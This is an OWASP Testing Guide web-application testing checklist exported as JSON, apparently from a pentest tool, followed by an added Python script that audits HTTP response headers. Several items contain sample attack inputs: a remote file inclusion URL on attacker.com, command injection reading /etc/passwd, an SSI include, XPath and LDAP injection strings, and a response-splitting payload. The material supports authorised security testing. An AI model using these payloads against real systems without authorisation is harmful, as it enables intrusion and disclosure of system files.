{
  "targets": [],
  "libraries": [
    {
      "id": "0cd0efbc-8bff-48f5-b7df-dd5ec569e832",
      "title": "OWASP Testing Checklist",
      "folders": [
        {
          "id": "7d9e5c30-a227-41e6-bb59-d415d333ffa7",
          "title": "Information Gathering",
          "checklist": [
            {"id": "040070e2-1fc7-42d8-9ad6-999dded57c4e", "title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage [OTG-INFO-001]", "content": "<p>Use a search engine to look for network diagrams and configurations, credentials, and error message content.</p>"},
            {"id": "61533992-ed61-4894-91ab-58e0ab27a8c5", "title": "Fingerprint Web Server [OTG-INFO-002]", "content": "<p>Find the version and type of the running web server to determine known vulnerabilities and the appropriate exploits, using \"HTTP header field ordering\" and \"Malformed requests test\".</p>"},
            {"id": "ba810c0e-9886-4463-ac87-8634e93ecb0b", "title": "Review Webserver Metafiles for Information Leakage [OTG-INFO-003]", "content": "<p>Analyze robots.txt and identify <META> tags on the website.</p>"},
            {"id": "52373732-ee7c-4bf5-9aa5-3030581089d4", "title": "Enumerate Applications on Webserver [OTG-INFO-004]", "content": "<p>Find applications hosted on the web server (virtual hosts/subdomains), non-standard ports, DNS zone transfers.</p>"},
            {"id": "92b8247b-08d0-46aa-b698-ddecce731ce5", "title": "Review Webpage Comments and Metadata for Information Leakage [OTG-INFO-005]", "content": "<p>Find sensitive information in webpage comments and metadata in the source code.</p>"},
            {"id": "7b63080a-ba7a-4611-9299-dafa0296008d", "title": "Identify application entry points [OTG-INFO-006]", "content": "<p>Identify entry points from hidden fields, parameters, HTTP methods and request/response header analysis.</p>"},
            {"id": "b337fff9-2863-4cd6-a466-b9ab4814f448", "title": "Map execution paths through application [OTG-INFO-007]", "content": "<p>Map the target application and understand the principal workflows.</p>"},
            {"id": "c876a7ca-64f3-4890-8321-2e1304ee94b5", "title": "Fingerprint Web Application Framework [OTG-INFO-008]", "content": "<p>Find the type of web application framework/CMS from HTTP headers, cookies, source code, specific files and folders.</p>"},
            {"id": "46f39364-94aa-41d2-b35a-1653eef12ee0", "title": "Fingerprint Web Application [OTG-INFO-009]", "content": "<p>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</p>"},
            {"id": "f9530601-fcf0-4473-926a-6583a721362c", "title": "Map Application Architecture [OTG-INFO-010]", "content": "<p>Identify the application architecture including web language, WAF, reverse proxy, application server, backend database.</p>"}
          ]
        },
        {
          "id": "05264ea4-bb36-449a-bcb4-7f05d2b55328",
          "title": "Configuration and Deploy Management Testing",
          "checklist": [
            {"id": "4ee96858-a706-46a4-84fe-e3a265ed7069", "title": "Test Network/Infrastructure Configuration [OTG-CONFIG-001]", "content": "<p>Understand the interactions between infrastructure elements, configuration management for software, backend DB server, WebDAV, FTP, in order to identify known vulnerabilities.</p>"},
            {"id": "8fc4c530-127e-4b24-aa37-f6db2e86ed11", "title": "Test Application Platform Configuration [OTG-CONFIG-002]", "content": "<p>Identify default installation files/directories, handling of server errors (40*, 50*), minimal privilege, software logging.</p>"},
            {"id": "e9d10626-d2a7-4128-91d0-b0648af6ad75", "title": "Test File Extensions Handling for Sensitive Information [OTG-CONFIG-003]", "content": "<p>Find important files and information (.asa, .inc, .sql, zip, tar, pdf, txt, etc.)</p>"},
            {"id": "0ed91649-9c25-4667-b958-977d37e62f81", "title": "Backup and Unreferenced Files for Sensitive Information [OTG-CONFIG-004]", "content": "<p>Check JS source code, comments, cache files, backup files (.old, .bak, .inc, .src) and guess filenames.</p>"},
            {"id": "23721906-107a-45b2-afdd-e3811c732010", "title": "Enumerate Infrastructure and Application Admin Interfaces [OTG-CONFIG-005]", "content": "<p>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc.), alternative server ports (Tomcat/8080).</p>"},
            {"id": "8a99a1a4-91b9-4bf6-9718-6254be3bb669", "title": "Test HTTP Methods [OTG-CONFIG-006]", "content": "<p>Identify the HTTP methods allowed by the web server with OPTIONS. Arbitrary HTTP methods, HEAD access control bypass and XST.</p>"},
            {"id": "e010cbcb-97e9-4a03-9f93-8d21bb941dce", "title": "Test HTTP Strict Transport Security [OTG-CONFIG-007]", "content": "<p>Identify the HSTS header in the web server's HTTPS response headers (match case-insensitively; header names are not case-sensitive). No output means the header is missing:<br>curl -s -D - -o /dev/null https://domain.com/ | grep -i '^strict-transport-security'</p>"},
            {"id": "9593e632-d402-4b6b-89d3-bf1da3c597bd", "title": "Test RIA cross domain policy [OTG-CONFIG-008]", "content": "<p>Analyse the permissions allowed by the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</p>"}
          ]
        },
        {
          "id": "0057517f-5c54-402c-9093-51e52912e156",
          "title": "Identity Management Testing",
          "checklist": [
            {"id": "703d7cad-33f5-4cc0-a52f-936ede1df481", "title": "Test Role Definitions [OTG-IDENT-001]", "content": "<p>Validate the system roles defined within the application by creating a permission matrix.</p>"},
            {"id": "da163849-1040-4992-aa26-33efd8ca0ad8", "title": "Test User Registration Process [OTG-IDENT-002]", "content": "<p>Verify that the identity requirements for user registration are aligned with business and security requirements.</p>"},
            {"id": "3154edbb-f2b9-4f45-8941-01a4e5a88b45", "title": "Test Account Provisioning Process [OTG-IDENT-003]", "content": "<p>Determine which roles are able to provision users and what sort of accounts they can provision.</p>"},
            {"id": "26ff7541-4ea0-4a18-b2d5-975fb25f902e", "title": "Testing for Account Enumeration and Guessable User Account [OTG-IDENT-004]", "content": "<p>Check for generic login error statements, return codes/parameter values; enumerate all possible valid user IDs (login system, forgot password).</p>"},
            {"id": "aa6989b1-c75c-4302-aba1-debb46fb4a63", "title": "Testing for Weak or unenforced username policy [OTG-IDENT-005]", "content": "<p>User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks) and valid account names can easily be guessed.</p>"},
            {"id": "76bda38f-c33f-466c-9dd4-c76b3be1bb73", "title": "Test Permissions of Guest/Training Accounts [OTG-IDENT-006]", "content": "<p>Guest and training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access. Evaluate consistency between the access policy and guest/training account access permissions.</p>"},
            {"id": "670b617d-bc63-4b4c-b3f3-92eb28dcfb95", "title": "Test Account Suspension/Resumption Process [OTG-IDENT-007]", "content": "<p>Verify that the account suspension and resumption processes align with business/security requirements, and that a suspended or revoked account cannot be used or reactivated without following the intended process.</p>"}
          ]
        },
        {
          "id": "0e8f7689-ec98-4a7a-bf12-240d03753932",
          "title": "Authentication Testing",
          "checklist": [
            {"id": "3655e131-b9a3-476e-a1dc-4a52575e3070", "title": "Testing for Credentials Transported over an Encrypted Channel [OTG-AUTHN-001]", "content": "<p>Check whether the login form is delivered over and submits to HTTPS (form action, Referer). Test sending credentials over both HTTP and HTTPS.</p>"},
            {"id": "f786c6df-f9fd-40b2-8d52-314469cdaae2", "title": "Testing for default credentials [OTG-AUTHN-002]", "content": "<p>Test for default credentials of common applications; test for default passwords of new accounts.</p>"},
            {"id": "c629a94d-556e-4048-b9bb-690352e82dbb", "title": "Testing for Weak lock out mechanism [OTG-AUTHN-003]", "content": "<p>Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. Evaluate the unlock mechanism's resistance to unauthorized account unlocking.</p>"},
            {"id": "9a3bb90b-8d68-4ae3-a731-7f68856d3c42", "title": "Testing for bypassing authentication schema [OTG-AUTHN-004]", "content": "<p>Force browsing (/admin/main.php, /page.asp?authenticated=yes), parameter modification, session ID prediction, SQL injection</p>"},
            {"id": "d48e6f3b-bfec-49c6-b4ff-e4c22e04b0d5", "title": "Test remember password functionality [OTG-AUTHN-005]", "content": "<p>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that credentials are not stored in clear text; even a hashed password in a cookie is a replayable credential, so a random, revocable token is preferred. Is autocomplete=off set on the password field?</p>"},
            {"id": "cbfc115a-4715-4338-bc20-9db8579d5778", "title": "Testing for Browser cache weakness [OTG-AUTHN-006]", "content": "<p>Check the browser history issue by clicking the \"Back\" button after logging out. Check the browser cache issue from the HTTP response headers: Cache-Control: no-store is required on sensitive pages; no-cache alone still allows the response to be stored and revalidated.</p>"},
            {"id": "c395a8c1-ec09-4f06-9953-5a0db8bf18f0", "title": "Testing for Weak password policy [OTG-AUTHN-007]", "content": "<p>Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.</p>"},
            {"id": "426e60c3-c6d5-4fd5-b556-08988379dd94", "title": "Testing for Weak security question/answer [OTG-AUTHN-008]", "content": "<p>Testing for weak pre-generated questions, testing for weak self-generated questions, testing for brute-forcible answers (unlimited attempts?)</p>"},
            {"id": "e9c5ecbe-1df5-4bc4-b7d8-0f86f37e24ff", "title": "Testing for weak password change or reset functionalities [OTG-AUTHN-009]", "content": "<p>Test password reset (old password displayed in plain text? sent via email? random token in the confirmation email?), test password change (old password required?), CSRF vulnerability?</p>"},
            {"id": "3febd48e-1ebf-4894-aa1e-0e39aba7a57d", "title": "Testing for Weaker authentication in alternative channel [OTG-AUTHN-010]", "content": "<p>Understand the primary mechanism and identify other channels (mobile app, call center, SSO).</p>"}
          ]
        },
        {
          "id": "9c5700ad-944c-425f-9d0e-8a9b071584f1",
          "title": "Authorization Testing",
          "checklist": [
            {"id": "11f52e32-647a-4e51-95b5-22626383558d", "title": "Testing Directory traversal/file include [OTG-AUTHZ-001]", "content": "<p>Dot-dot-slash attack (../), directory traversal, local file inclusion/remote file inclusion.</p>"},
            {"id": "aa511e18-bae5-4b77-bef7-5cfc7b57a316", "title": "Testing for bypassing authorization schema [OTG-AUTHZ-002]", "content": "<p>Access a resource without authentication? Bypass ACL, force browsing (/admin/adduser.jsp)</p>"},
            {"id": "a8606baa-fe24-4bef-ab3a-ebdf06597b7f", "title": "Testing for Privilege Escalation [OTG-AUTHZ-003]", "content": "<p>Test for role/privilege escalation by manipulating the values of hidden variables, e.g. change the parameter groupid=2 to groupid=1.</p>"},
            {"id": "f75fb6ec-a5c8-40ec-9df5-e71e91e4f2ba", "title": "Testing for Insecure Direct Object References [OTG-AUTHZ-004]", "content": "<p>Force-change a parameter value (?invoice=123 -> ?invoice=456)</p>"}
          ]
        },
        {
          "id": "1cc0e42c-d038-41e3-b05f-b09712294c54",
          "title": "Session Management Testing",
          "checklist": [
            {"id": "fd0c3104-1967-43b6-bca5-eec6cf62c979", "title": "Testing for Bypassing Session Management Schema [OTG-SESS-001]", "content": "<p>Session ID analysis/prediction, unencrypted cookie transport, brute force.</p>"},
            {"id": "1aad4abe-52db-44dd-bf6f-0295c005ebb7", "title": "Testing for Cookies attributes [OTG-SESS-002]", "content": "<p>Check the HttpOnly and Secure flags, expiration, inspect for sensitive data.</p>"},
            {"id": "4cd6a7db-0798-4bda-8c55-66f5e7802050", "title": "Testing for Session Fixation [OTG-SESS-003]", "content": "<p>The application does not renew the session cookie after successful user authentication.</p>"},
            {"id": "b45dfe6a-805c-40db-8700-644b38375876", "title": "Testing for Exposed Session Variables [OTG-SESS-004]", "content": "<p>Encryption and reuse of session token vulnerabilities; is the session ID sent with the GET method?</p>"},
            {"id": "ed50a16e-4b55-4a75-a9a8-d9200048c534", "title": "Testing for Cross Site Request Forgery [OTG-SESS-005]", "content": "<p>URL analysis, direct access to functions without any token.</p>"},
            {"id": "27fdd3b0-d5a3-4f0d-aa85-3e97bf39994d", "title": "Testing for logout functionality [OTG-SESS-006]", "content": "<p>Check session reuse after logout, both server-side and SSO.</p>"},
            {"id": "4d65bee7-8f06-4038-b0b0-a511cae15fe4", "title": "Test Session Timeout [OTG-SESS-007]", "content": "<p>Check the session timeout; after the timeout has passed, all session tokens should be destroyed or be unusable.</p>"},
            {"id": "9505b6d0-8e80-41e4-a0cf-608f9d8bd8f3", "title": "Testing for Session puzzling [OTG-SESS-008]", "content": "<p>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</p>"}
          ]
        },
        {
          "id": "d1bd985e-b315-4cf3-a60a-6ed7d5f0e7f5",
          "title": "Data Validation Testing",
          "checklist": [
            {"id": "e1264c39-c1a9-4a54-ac44-2fb79098d0bf", "title": "Testing for Reflected Cross Site Scripting [OTG-INPVAL-001]", "content": "<p>Check input validation, replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</p>"},
            {"id": "c1f1ae0b-2d6c-4a61-8dc7-e314cd73b1e8", "title": "Testing for Stored Cross Site Scripting [OTG-INPVAL-002]", "content": "<p>Check input forms/upload forms and analyze the HTML code; leverage XSS with BeEF.</p>"},
            {"id": "c8786c4c-408c-425d-a6dd-c38c2c0e71ef", "title": "Testing for HTTP Verb Tampering [OTG-INPVAL-003]", "content": "<p>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</p>"},
            {"id": "a21707e3-1eba-4ef4-ac0f-85e945a47214", "title": "Testing for HTTP Parameter pollution [OTG-INPVAL-004]", "content": "<p>Identify any form or action that allows user-supplied input to bypass input validation and filters using HPP.</p>"},
            {"id": "2f2941d7-8def-40d1-b654-f5cb8cd73f82", "title": "Testing for SQL Injection [OTG-INPVAL-005]", "content": "<p>Union, boolean, error based, out-of-band, time delay.</p>"},
            {"id": "ca6798e5-481a-422e-babe-63f4d3bbbfdd", "title": "Oracle Testing", "content": "<p>Identify URLs for PL/SQL web applications, access with PL/SQL packages, bypass the PL/SQL exclusion list, SQL injection</p>"},
            {"id": "bd0090d3-45e7-4fdc-a09b-a09837f9a5fa", "title": "MySQL Testing", "content": "<p>Identify MySQL version, single quote, information_schema, read/write file.</p>"},
            {"id": "de582ff5-c743-4362-a343-d59d0fb84ac3", "title": "SQL Server Testing", "content": "<p>Comment operator (--), query separator (;), stored procedures (xp_cmdshell)</p>"},
            {"id": "6cbb1d28-4063-4006-8a1f-79968ec744b3", "title": "Testing PostgreSQL", "content": "<p>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/write file, shell injection (OS command)</p>"},
            {"id": "b06cab16-a91f-4636-aa83-9a8b8f328c3f", "title": "MS Access Testing", "content": "<p>Enumerate the columns through error-based techniques (GROUP BY), obtain the database schema combined with fuzzdb.</p>"},
            {"id": "02123845-dee2-43aa-9854-75dad240ea4f", "title": "Testing for NoSQL injection", "content": "<p>Identify NoSQL databases, pass special characters (' \" \\ ; { } ), attack with reserved variable names and operators.</p>"},
            {"id": "4d637f64-2147-48aa-8183-a241311536c4", "title": "Testing for LDAP Injection [OTG-INPVAL-006]", "content": "<p>/ldapsearch?user=*<br>user=*user=*)(uid=*))(|(uid=*<br>pass=password</p>"},
            {"id": "fdc0859c-f4d0-4adc-8007-71aa410a3df3", "title": "Testing for ORM Injection [OTG-INPVAL-007]", "content": "<p>Testing for ORM injection is identical to SQL injection testing.</p>"},
            {"id": "6024abeb-0235-49d3-831b-7def7e4610e2", "title": "Testing for XML Injection [OTG-INPVAL-008]", "content": "<p>Check with XML meta characters<br>', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG</p>"},
            {"id": "1c7381de-c210-4d2a-9526-e35777fbfb3b", "title": "Testing for SSI Injection [OTG-INPVAL-009]", "content": "<p>• Presence of .shtml extension<br>• Check for these characters<br>< ! # = / . \" - > and [a-zA-Z0-9]<br>• include string = <!--#include virtual=\"/etc/passwd\" --></p>"},
            {"id": "ae0dd359-ee9e-459d-a6c1-67dfa3b862ee", "title": "Testing for XPath Injection [OTG-INPVAL-010]", "content": "<p>Check for XML error enumeration by supplying a single quote (')<br>Username: ' or '1' = '1<br>Password: ' or '1' = '1</p>"},
            {"id": "92e7a83e-aebb-4592-b68e-b72efd861f28", "title": "IMAP/SMTP Injection [OTG-INPVAL-011]", "content": "<p>• Identifying vulnerable parameters with special characters<br>(e.g.: \\, ', \", @, #, !, |)<br>• Understanding the data flow and deployment structure of the client<br>• IMAP/SMTP command injection (header, body, footer)</p>"},
            {"id": "dd55f2e8-2664-4366-b10c-85012afadb5e", "title": "Testing for Code Injection [OTG-INPVAL-012]", "content": "<p>Enter OS commands in the input field.<br>?arg=1; system('id')</p>"},
            {"id": "e49829a4-c44c-4ad4-b602-078331ad1861", "title": "Testing for Local File Inclusion", "content": "<p>LFI with dot-dot-slash (../../), PHP wrapper (php://filter/convert.base64-encode/resource)</p>"},
            {"id": "76cbd786-48a6-49bc-81cc-aa746ec1d3af", "title": "Testing for Remote File Inclusion", "content": "<p>RFI from a malicious URL<br>page.php?file=http://attacker.com/malicious_page</p>"},
            {"id": "8895f1b0-b432-476f-b070-919edb56db8b", "title": "Testing for Command Injection [OTG-INPVAL-013]", "content": "<p>Understand the application platform, OS, folder structure, relative paths, and execute OS commands on the web server.<br>%3Bcat%20/etc/passwd<br>test.pdf+|+Dir C:\\</p>"},
            {"id": "d54cab52-9c37-41b3-a57f-871aaa4dbdae", "title": "Testing for Buffer overflow [OTG-INPVAL-014]", "content": "<p>• Testing for heap overflow vulnerability<br>• Testing for stack overflow vulnerability<br>• Testing for format string vulnerability</p>"},
            {"id": "1b7f19da-c158-4ff7-bfe9-5aca3b85f08a", "title": "Testing for Heap overflow", "content": "<p></p>"},
            {"id": "005bde1e-e1c5-4227-bb9d-0d8480fcf9ac", "title": "Testing for Stack overflow", "content": "<p></p>"},
            {"id": "86dbf185-2ed7-41dc-9c82-66606da8f23e", "title": "Testing for Format string", "content": "<p></p>"},
            {"id": "517220c3-f3b8-4911-8abe-f80711f46245", "title": "Testing for incubated vulnerabilities [OTG-INPVAL-015]", "content": "<p>File upload, stored XSS, SQL/XPath injection, misconfigured servers (Tomcat, Plesk, cPanel)</p>"},
            {"id": "01aa5617-e7e1-4858-aa53-0a86b5c78c7f", "title": "Testing for HTTP Splitting/Smuggling [OTG-INPVAL-016]", "content": "<p>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html></p>"}
          ]
        },
        {
          "id": "d83f5968-7c16-4eb6-b118-89780a3b5afd",
          "title": "Error Handling",
          "checklist": [
            {"id": "81e0cecc-495b-4713-a043-96eb408ab67f", "title": "Analysis of Error Codes [OTG-ERR-001]", "content": "<p>Locate error codes generated by applications or web servers. Collect sensitive information from those errors (web server, application server, database).</p>"},
            {"id": "f312ec25-8af8-467c-bf55-939eb1e11741", "title": "Analysis of Stack Traces [OTG-ERR-002]", "content": "<p>• Invalid input / empty inputs<br>• Input that contains non-alphanumeric characters or query syntax<br>• Access to internal pages without authentication<br>• Bypassing application flow</p>"}
          ]
        },
        {
          "id": "66f06ef3-129d-4c81-9251-2dc2ce70e7d7",
          "title": "Cryptography",
          "checklist": [
            {"id": "44d8cbeb-3bc7-4924-8c98-df524f532a41", "title": "Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection [OTG-CRYPST-001]", "content": "<p>Identify SSL/TLS services, identify weak ciphers/protocols and exposure to known attacks (e.g. RC4; BEAST, CRIME, POODLE)</p>"},
            {"id": "923a59e1-458e-4929-a1c7-52130dc26b49", "title": "Testing for Padding Oracle [OTG-CRYPST-002]", "content": "<p>Compare the responses in three different states:<br>• Cipher text gets decrypted, resulting data is correct.<br>• Cipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.<br>• Cipher text decryption fails due to padding errors.</p>"},
            {"id": "99e46660-2ab2-4078-89fd-7d92931c8edc", "title": "Testing for Sensitive information sent via unencrypted channels [OTG-CRYPST-003]", "content": "<p>Check sensitive data during transmission:<br>• Information used in authentication (e.g. credentials, PINs, session identifiers, tokens, cookies…)<br>• Information protected by laws, regulations or specific organizational policy (e.g. credit cards, customer data)</p>"}
          ]
        },
        {
          "id": "25dcc3d1-99fa-48ce-8ba7-9bd23b3509e8",
          "title": "Business logic Testing",
          "checklist": [
            {"id": "42c90230-5081-490f-8494-29a717cd2790", "title": "Test Business Logic Data Validation [OTG-BUSLOGIC-001]", "content": "<p>• Look for data entry points or hand-off points between systems or software.<br>• Once found, try to insert logically invalid data into the application/system.</p>"},
            {"id": "1b19c429-1610-410d-8417-06e0779c4546", "title": "Test Ability to Forge Requests [OTG-BUSLOGIC-002]", "content": "<p>• Look for guessable, predictable or hidden functionality of fields.<br>• Once found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.</p>"},
            {"id": "af3b0304-2cc3-497e-a5b4-dda4f605f415", "title": "Test Integrity Checks [OTG-BUSLOGIC-003]", "content": "<p>• Look for parts of the application/system (components, for example input fields, databases or logs) that move, store or handle data/information.<br>• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information in each component.<br>• Attempt to insert, update or delete the data/information values with invalid data/information in each component (i.e. input, database, or log) as users that should not be allowed to per the business logic workflow.</p>"},
            {"id": "7de42f0d-3661-41ad-8f70-57b582b67096", "title": "Test for Process Timing [OTG-BUSLOGIC-004]", "content": "<p>• Look for application/system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.<br>• Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on any timing.</p>"},
            {"id": "e5653865-0e60-4aae-834a-5e3107fcd235", "title": "Test Number of Times a Function Can be Used Limits [OTG-BUSLOGIC-005]", "content": "<p>• Look for functions or features in the application or system that should not be executed more than a single time or a specified number of times during the business logic workflow.<br>• For each of the functions and features found that should only be executed a single time or a specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute them more than the allowable number of times.</p>"},
            {"id": "39d7a484-a934-4a0b-92ae-f45748b2af68", "title": "Testing for the Circumvention of Work Flows [OTG-BUSLOGIC-006]", "content": "<p>• Look for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.<br>• For each method develop a misuse case and try to circumvent or perform an action that is \"not acceptable\" per the business logic workflow.</p>"},
            {"id": "8d2645ea-b677-498f-94ec-cc59e2ea32b5", "title": "Test Defenses Against Application Mis-use [OTG-BUSLOGIC-007]", "content": "<p>Measures that might indicate the application has in-built self-defense:<br>• Changed responses<br>• Blocked requests<br>• Actions that log a user out or lock their account</p>"},
            {"id": "330cf5da-7d33-45b5-9189-5b835873725d", "title": "Test Upload of Unexpected File Types [OTG-BUSLOGIC-008]", "content": "<p>• Review the project documentation and perform some exploratory testing looking for file types that should be \"unsupported\" by the application/system.<br>• Try to upload these \"unsupported\" files and verify that they are properly rejected.<br>• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.<br>PS. file.phtml, shell.phPWND, SHELL~1.PHP</p>"},
            {"id": "a3b2690c-ab26-47df-a426-3b14e20d0fe3", "title": "Test Upload of Malicious Files [OTG-BUSLOGIC-009]", "content": "<p>• Develop or acquire a known \"malicious\" file.<br>• Try to upload the malicious file to the application/system and verify that it is correctly rejected.<br>• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.</p>"}
          ]
        }
      ]
    }
  ],
  "templates": [],
  "payloads": [],
  "messages": {"showDeleteConfirmation": true}
}
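The following is an added example, not part of the checklist data above and not OWASP's own tooling. It turns the header-based items in that checklist (OTG-INFO-002 server fingerprinting, OTG-CONFIG-006 HTTP methods, OTG-CONFIG-007 HSTS, OTG-AUTHN-006 cache headers and OTG-SESS-002 cookie attributes) into one offline check over a raw HTTP response, so that a weak response and a hardened one can be compared side by side. The two responses are constructed, not captured from any real host; the 180-day HSTS threshold, the risky-method set and the cookie-name heuristic are the author's assumptions, not values the checklist specifies.

```python
"""Audit one raw HTTP/1.x response against several OWASP Testing Guide v4 items.

Added example for the checklist above. Samples are constructed, not captured.
Items covered:
  OTG-INFO-002   version strings in Server / X-Powered-By
  OTG-CONFIG-006 risky methods in the Allow header of an OPTIONS reply
  OTG-CONFIG-007 Strict-Transport-Security missing, short, or not covering subdomains
  OTG-AUTHN-006  Cache-Control without no-store on an authenticated page
  OTG-SESS-002   session cookie lacking Secure / HttpOnly / SameSite
"""
import re
from typing import List, Tuple

RISKY_METHODS = {"TRACE", "TRACK", "PUT", "DELETE", "CONNECT"}   # assumed set
SESSION_COOKIE_RE = re.compile(r"sess|sid|token|auth", re.I)      # assumed heuristic
MIN_HSTS_AGE = 15552000                                           # 180 days, assumed


def parse_response(raw: bytes) -> Tuple[int, List[Tuple[str, str]]]:
    """Return (status_code, [(lower-cased header name, value), ...]).

    Headers come back as a list, not a dict, so repeated Set-Cookie lines survive.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def audit_response(raw: bytes, authenticated: bool = True) -> List[str]:
    """Return one finding string per checklist condition the response fails."""
    _, headers = parse_response(raw)
    first = {n: v for n, v in reversed(headers)}  # first occurrence of each name wins
    findings = []

    # OTG-INFO-002: anything that looks like a version number is disclosure.
    for name in ("server", "x-powered-by"):
        if name in first and re.search(r"\d+\.\d+", first[name]):
            findings.append(f"OTG-INFO-002 {name} discloses version: {first[name]}")

    # OTG-CONFIG-006: the Allow header is what an OPTIONS request returns.
    if "allow" in first:
        offered = {m.strip().upper() for m in first["allow"].split(",")}
        risky = sorted(RISKY_METHODS & offered)
        if risky:
            findings.append("OTG-CONFIG-006 risky methods allowed: " + ", ".join(risky))

    # OTG-CONFIG-007: HSTS must exist, be long-lived and cover subdomains.
    hsts = first.get("strict-transport-security")
    if hsts is None:
        findings.append("OTG-CONFIG-007 Strict-Transport-Security missing")
    else:
        age = re.search(r"max-age=(\d+)", hsts, re.I)
        if not age or int(age.group(1)) < MIN_HSTS_AGE:
            findings.append(f"OTG-CONFIG-007 HSTS max-age too small: {hsts}")
        if "includesubdomains" not in hsts.lower():
            findings.append("OTG-CONFIG-007 HSTS lacks includeSubDomains")

    # OTG-AUTHN-006: no-cache alone still lets the browser store the page.
    if authenticated and "no-store" not in first.get("cache-control", "").lower():
        findings.append("OTG-AUTHN-006 Cache-Control lacks no-store: "
                        + (first.get("cache-control") or "(absent)"))

    # OTG-SESS-002: check every cookie whose name looks like a session cookie.
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        if not SESSION_COOKIE_RE.search(cookie_name):
            continue
        attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(f"OTG-SESS-002 cookie {cookie_name} lacks {flag}")
    return findings


# Constructed sample responses (not captured from any real host).
WEAK = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.29 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.2.24\r\n"
    b"Allow: GET, POST, PUT, DELETE, TRACE, OPTIONS\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Set-Cookie: PHPSESSID=abc123; Path=/\r\n"
    b"Set-Cookie: lang=en; Path=/\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html>account page</html>"
)
HARDENED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Allow: GET, POST, OPTIONS\r\n"
    b"Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    b"Cache-Control: no-store, no-cache, must-revalidate\r\n"
    b"Set-Cookie: __Host-session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    b"Content-Type: text/html\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response(raw) or ["no findings"])
```

To use it against a live target, capture the response with `curl -s -D - https://domain.com/` (the checklist's own OTG-CONFIG-007 command) and feed the bytes to `audit_response`; an OPTIONS request is needed for the Allow header, and `authenticated=False` suppresses the cache-header check on public pages. The `lang` cookie in the weak sample is deliberately not flagged: the cookie-name heuristic only looks at cookies that appear to carry a session, so a real engagement should widen it to whatever names the target uses.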